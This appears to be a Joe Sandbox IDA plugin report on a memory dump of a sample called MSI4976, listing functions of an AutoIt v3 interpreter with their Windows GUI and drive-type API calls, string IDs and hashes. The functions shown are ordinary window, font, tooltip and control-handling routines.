                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                        • String ID: @U=u
                                        • API String ID: 3521893082-2594219639
                                        • Opcode ID: 1a85740907f301b31912b9d828f8c580f571fd358f4847e1505b9f50d499aab4
                                        • Instruction ID: 0c96ca6fba4b66c606ffa3ec90e3acef1b43a856f76ab6480af6b789e0f4bcb3
                                        • Opcode Fuzzy Hash: 1a85740907f301b31912b9d828f8c580f571fd358f4847e1505b9f50d499aab4
                                        • Instruction Fuzzy Hash: B0919C72408301BFDB52AF64DC48E6BBBADFF8A320F100A19F962965E0D771D944CB52
                                        Function 0037A3F7 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 284windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 0037A42A
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0037A4E9
                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0037A527
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0037A539
                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0037A57F
                                        • GetClientRect.USER32(00000000,?), ref: 0037A58B
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0037A5CF
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0037A5DE
                                        • GetStockObject.GDI32(00000011), ref: 0037A5EE
                                        • SelectObject.GDI32(00000000,00000000), ref: 0037A5F2
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0037A602
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037A60B
                                        • DeleteDC.GDI32(00000000), ref: 0037A614
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0037A642
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0037A659
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0037A694
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0037A6A8
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0037A6B9
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0037A6E9
                                        • GetStockObject.GDI32(00000011), ref: 0037A6F4
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0037A6FF
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0037A709
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-2771358697
                                        • Opcode ID: ead0560e1d466ad45fea87e136f88fe593b6f6c24762ea8814efecc9b9c9090c
                                        • Instruction ID: 3726eb35c8ab25085cdc3400cfb6aaa6f737d9ef73e782f4b527fa73b55cd182
                                        • Opcode Fuzzy Hash: ead0560e1d466ad45fea87e136f88fe593b6f6c24762ea8814efecc9b9c9090c
                                        • Instruction Fuzzy Hash: 76A16F71A10215BFEB26DBA5DC8AFAE7BBDEB45710F008114F615AB2E0D774AD40CB60
                                        Function 0038D385 Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 186windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 0038D3BE
                                        • SetTextColor.GDI32(?,?), ref: 0038D3C2
                                        • GetSysColorBrush.USER32(0000000F), ref: 0038D3D8
                                        • GetSysColor.USER32(0000000F), ref: 0038D3E3
                                        • CreateSolidBrush.GDI32(?), ref: 0038D3E8
                                        • GetSysColor.USER32(00000011), ref: 0038D400
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0038D40E
                                        • SelectObject.GDI32(?,00000000), ref: 0038D41F
                                        • SetBkColor.GDI32(?,00000000), ref: 0038D428
                                        • SelectObject.GDI32(?,?), ref: 0038D435
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0038D454
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0038D46B
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0038D480
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0038D4A8
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0038D4CF
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0038D4ED
                                        • DrawFocusRect.USER32(?,?), ref: 0038D4F8
                                        • GetSysColor.USER32(00000011), ref: 0038D506
                                        • SetTextColor.GDI32(?,00000000), ref: 0038D50E
                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0038D522
                                        • SelectObject.GDI32(?,0038D0B5), ref: 0038D539
                                        • DeleteObject.GDI32(?), ref: 0038D544
                                        • SelectObject.GDI32(?,?), ref: 0038D54A
                                        • DeleteObject.GDI32(?), ref: 0038D54F
                                        • SetTextColor.GDI32(?,?), ref: 0038D555
                                        • SetBkColor.GDI32(?,?), ref: 0038D55F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID: @U=u
                                        • API String ID: 1996641542-2594219639
                                        • Opcode ID: f78c9c672d6dd6adf70fc886666f6ab73c61fda333deb16306da0aaeebb10972
                                        • Instruction ID: e1d242fc989bd22e2c9d1290028d605d513deb3215ac1797ce568bb5aa0b04b8
                                        • Opcode Fuzzy Hash: f78c9c672d6dd6adf70fc886666f6ab73c61fda333deb16306da0aaeebb10972
                                        • Instruction Fuzzy Hash: B8515C71900208BFDF12AFA8DC48EAE7BB9FF09320F214555F912AB6A1D7719940CF50
                                        Function 0036E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036E45E
                                        • GetDriveTypeW.KERNEL32(?,003BDC88,?,\\.\,003BDBF0), ref: 0036E54B
                                        • SetErrorMode.KERNEL32(00000000,003BDC88,?,\\.\,003BDBF0), ref: 0036E6B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: 0230c396855d965e21cda6da60392b8fe7f9e504c537ba784d31f9a08ae60d69
                                        • Instruction ID: 72c8ebec1f69e49caa9749e6c9ec4186e0ea7831463cbc085ce984c212fcc4cf
                                        • Opcode Fuzzy Hash: 0230c396855d965e21cda6da60392b8fe7f9e504c537ba784d31f9a08ae60d69
                                        • Instruction Fuzzy Hash: 76511839218301ABC303DF14E8918AAB794BB55704F51C91BF442AB799DB70DE4DDB53
                                        Function 003248C8 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 491windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32 ref: 00324956
                                        • DeleteObject.GDI32(00000000), ref: 00324998
                                        • DeleteObject.GDI32(00000000), ref: 003249A3
                                        • DestroyCursor.USER32(00000000), ref: 003249AE
                                        • DestroyWindow.USER32(00000000), ref: 003249B9
                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0039E179
                                        • 6FB80200.COMCTL32(?,000000FF,?), ref: 0039E1B2
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0039E5E0
                                          • Part of subcall function 003249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00324954,00000000), ref: 00324A23
                                        • SendMessageW.USER32 ref: 0039E627
                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0039E63E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DestroyMessageSendWindow$DeleteObject$B80200CursorInvalidateMoveRect
                                        • String ID: 0$@U=u
                                        • API String ID: 295266683-975001249
                                        • Opcode ID: e0fc44509f831004280c263088db48a31d78611b1ef8f6fa2f1f382867d6f4f9
                                        • Instruction ID: 2283473b8604279f399ca7c6299d90c36b6d0d70a708d15f967fff1a6064fc7d
                                        • Opcode Fuzzy Hash: e0fc44509f831004280c263088db48a31d78611b1ef8f6fa2f1f382867d6f4f9
                                        • Instruction Fuzzy Hash: A112B030600211EFDF26DF14D884BAABBE9BF06304F154569F59ADB662C731EC85CB91
                                        Function 0038C4F9 Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 447windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0038C598
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0038C64E
                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 0038C669
                                        • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0038C925
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window
                                        • String ID: 0$@U=u
                                        • API String ID: 2326795674-975001249
                                        • Opcode ID: a9960beaee4c4bd40a960aa1ca2873e0fa468a5c737beaeb125757dc4a2a003f
                                        • Instruction ID: 73168b5d01d65823ad4b89fd5e0056efe091affb179f641b42b93355549be6d1
                                        • Opcode Fuzzy Hash: a9960beaee4c4bd40a960aa1ca2873e0fa468a5c737beaeb125757dc4a2a003f
                                        • Instruction Fuzzy Hash: 56F11571224341AFE717EF24CC84BAABBE8FF49354F081669F589D62A1C774C840CB62
                                        Function 0032C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __wcsnicmp
                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 1038674560-86951937
                                        • Opcode ID: a831d89879fc7375970004052c47c3d0cfc2ff2495672755d9c0332ffbfa6a49
                                        • Instruction ID: de559b17fecad796c71b2c35817b16565bc0aa4c1d0608b7763b5f20c9cb2944
                                        • Opcode Fuzzy Hash: a831d89879fc7375970004052c47c3d0cfc2ff2495672755d9c0332ffbfa6a49
                                        • Instruction Fuzzy Hash: 986149716407267BDB23AA29AC82FFF339CEF15744F045025FD42AF582EB60DA41C6A1
                                        Function 00386189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,003BDBF0), ref: 00386245
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                        • API String ID: 3964851224-45149045
                                        • Opcode ID: 87dc35bb1b0a0a269a260abe9c380b93a8dea9c08a72544c5485f3c222a5bb16
                                        • Instruction ID: 1202286106c34a4507f65de4fb96a846419539629366c06c4babfa814ef06b90
                                        • Opcode Fuzzy Hash: 87dc35bb1b0a0a269a260abe9c380b93a8dea9c08a72544c5485f3c222a5bb16
                                        • Instruction Fuzzy Hash: FFC194352043018FCB0BFF14D452A6E7796AF95354F4448A9F8865F7A6DB31DD0ACB82
                                        Function 0038B4D4 Relevance: 40.6, APIs: 21, Strings: 2, Instructions: 400windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0038B5C0
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0038B5D1
                                        • CharNextW.USER32(0000014E), ref: 0038B600
                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0038B641
                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0038B657
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0038B668
                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0038B685
                                        • SetWindowTextW.USER32(?,0000014E), ref: 0038B6D7
                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0038B6ED
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 0038B71E
                                        • _memset.LIBCMT ref: 0038B743
                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0038B78C
                                        • _memset.LIBCMT ref: 0038B7EB
                                        • SendMessageW.USER32 ref: 0038B815
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 0038B86D
                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0038B91A
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0038B93C
                                        • GetMenuItemInfoW.USER32(?), ref: 0038B986
                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0038B9B3
                                        • DrawMenuBar.USER32(?), ref: 0038B9C2
                                        • SetWindowTextW.USER32(?,0000014E), ref: 0038B9EA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                        • String ID: 0$@U=u
                                        • API String ID: 1073566785-975001249
                                        • Opcode ID: db22c8aa7f9921e5398c07473fc3a3e91fda645d63399401c4ff6fe9005dcec7
                                        • Instruction ID: 01e067ff81ab4ffa06fb2e88d0d4641ec86b4b54e84697be88d2e754d7832e66
                                        • Opcode Fuzzy Hash: db22c8aa7f9921e5398c07473fc3a3e91fda645d63399401c4ff6fe9005dcec7
                                        • Instruction Fuzzy Hash: BEE15E7590031AABDF22AF51CC84EEEBBB8FF06750F108196F915AB190DB749A41CF60
                                        Function 0038744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00387587
                                        • GetDesktopWindow.USER32 ref: 0038759C
                                        • GetWindowRect.USER32(00000000), ref: 003875A3
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00387605
                                        • DestroyWindow.USER32(?), ref: 00387631
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0038765A
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00387678
                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0038769E
                                        • SendMessageW.USER32(?,00000421,?,?), ref: 003876B3
                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003876C6
                                        • IsWindowVisible.USER32(?), ref: 003876E6
                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00387701
                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00387715
                                        • GetWindowRect.USER32(?,?), ref: 0038772D
                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00387753
                                        • GetMonitorInfoW.USER32 ref: 0038776D
                                        • CopyRect.USER32(?,?), ref: 00387784
                                        • SendMessageW.USER32(?,00000412,00000000), ref: 003877EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                        • String ID: ($0$tooltips_class32
                                        • API String ID: 698492251-4156429822
                                        • Opcode ID: 07e17ce091ddb9a7edfc6108eb8b86b6f48ad78353065a80ca34de0ac500dfde
                                        • Instruction ID: 7ee4dced330fabf360adac70a530f0121e6a312df8f66900ce94e550dfb57fac
                                        • Opcode Fuzzy Hash: 07e17ce091ddb9a7edfc6108eb8b86b6f48ad78353065a80ca34de0ac500dfde
                                        • Instruction Fuzzy Hash: 6FB1AF71608300AFDB05EF64D984B6EBBE9FF89310F108A5DF5999B291DB70E805CB91
                                        Function 0033A756 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0033A839
                                        • GetSystemMetrics.USER32(00000007), ref: 0033A841
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0033A86C
                                        • GetSystemMetrics.USER32(00000008), ref: 0033A874
                                        • GetSystemMetrics.USER32(00000004), ref: 0033A899
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0033A8B6
                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0033A8C6
                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0033A8F9
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0033A90D
                                        • GetClientRect.USER32(00000000,000000FF), ref: 0033A92B
                                        • GetStockObject.GDI32(00000011), ref: 0033A947
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0033A952
                                          • Part of subcall function 0033B736: GetCursorPos.USER32(000000FF), ref: 0033B749
                                          • Part of subcall function 0033B736: ScreenToClient.USER32(00000000,000000FF), ref: 0033B766
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000001), ref: 0033B78B
                                          • Part of subcall function 0033B736: GetAsyncKeyState.USER32(00000002), ref: 0033B799
                                        • SetTimer.USER32(00000000,00000000,00000028,0033ACEE), ref: 0033A979
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: @U=u$AutoIt v3 GUI
                                        • API String ID: 1458621304-2077007950
                                        • Opcode ID: b5fb1eccd40e11034ae765285b819b9516444378428cdf01076bda286164b7d7
                                        • Instruction ID: 1d2993d5144ec636b0a70d5f715da4d9eaccd2a46b0ff08c30339677d05c4fc2
                                        • Opcode Fuzzy Hash: b5fb1eccd40e11034ae765285b819b9516444378428cdf01076bda286164b7d7
                                        • Instruction Fuzzy Hash: 9FB18E71A0060AEFDB16DFA8CC85BAD7BB8FB08314F114229FA56AB2D0D734D840CB51
